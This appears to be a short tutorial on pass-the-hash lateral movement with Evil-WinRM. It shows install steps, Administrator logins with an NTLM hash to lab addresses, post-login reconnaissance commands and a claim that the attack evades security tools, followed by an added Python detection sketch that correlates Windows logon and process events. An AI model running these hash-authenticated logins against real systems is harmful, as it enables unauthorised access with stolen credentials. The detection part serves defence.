Pass the Hash with Evil-WinRM

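Install Evil-WinRM

# The gem command ships with the ruby package; the apt package named "gem" is unrelated
sudo apt install ruby -y
# gem install does not prompt, so no -y is needed
sudo gem install evil-winrm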

If WinRM is enabled on the endpoint, the awesome tool Evil-WinRM supports authenticating with a hash instead of a password. This is a very quiet attack that security solutions do not often catch.

WinRM (Windows Remote Management) is the Microsoft implementation of the WS-Management protocol, a standard SOAP-based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in its operating systems to make life easier for system administrators.

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.11
hostname
ipconfig
whoami
menu
services

evil-winrm -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' -i 192.168.56.22
hostname
ipconfig
whoami
menu
services
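
On the target, a session like the ones above shows up as an NTLM network logon (Security event 4624, logon type 3) followed by wsmprovhost.exe starting (event 4688, which requires process creation auditing). The sketch below is an added example, not part of the original page or of Evil-WinRM. It correlates the two events over constructed sample data; the watched account list, the admin workstation allowlist, the 10-second window and all hostnames and source addresses are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample events (not from the page). Field names follow Windows
# Security events 4624 (logon) and 4688 (process creation).
EVENTS = [
    {"EventID": 4624, "Time": "2024-05-01T10:00:00", "Computer": "SRV01",
     "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.50"},
    {"EventID": 4688, "Time": "2024-05-01T10:00:02", "Computer": "SRV01",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    # Kerberos logon followed by a WinRM host process: not flagged.
    {"EventID": 4624, "Time": "2024-05-01T11:00:00", "Computer": "SRV02",
     "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "IpAddress": "192.168.56.60"},
    {"EventID": 4688, "Time": "2024-05-01T11:00:01", "Computer": "SRV02",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    # NTLM logon from an allowlisted admin workstation: not flagged.
    {"EventID": 4624, "Time": "2024-05-01T12:00:00", "Computer": "SRV01",
     "TargetUserName": "Administrator", "LogonType": 3,
     "AuthenticationPackageName": "NTLM", "IpAddress": "192.168.56.5"},
    {"EventID": 4688, "Time": "2024-05-01T12:00:03", "Computer": "SRV01",
     "NewProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
]
WATCHED = {"administrator"}       # assumption: privileged accounts to watch
ADMIN_HOSTS = {"192.168.56.5"}    # assumption: approved admin workstation
WINDOW = timedelta(seconds=10)    # assumption: logon-to-process window

def _ts(event):
    return datetime.fromisoformat(event["Time"])

def ntlm_winrm_logons(events):
    """Return watched-account NTLM network logons that are followed within
    WINDOW by wsmprovhost.exe starting on the same computer."""
    winrm = [e for e in events if e["EventID"] == 4688
             and e["NewProcessName"].lower().endswith("\\wsmprovhost.exe")]
    hits = []
    for e in events:
        if (e["EventID"] != 4624 or e["LogonType"] != 3
                or e["AuthenticationPackageName"].upper() != "NTLM"
                or e["TargetUserName"].lower() not in WATCHED
                or e["IpAddress"] in ADMIN_HOSTS):
            continue
        if any(p["Computer"] == e["Computer"]
               and timedelta(0) <= _ts(p) - _ts(e) <= WINDOW for p in winrm):
            hits.append((e["Time"], e["Computer"], e["IpAddress"]))
    return hits

if __name__ == "__main__":
    print(*ntlm_winrm_logons(EVENTS), sep="\n")
```

Time-window correlation can mis-pair events on a busy server, so treat a hit as a lead to review rather than a verdict.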
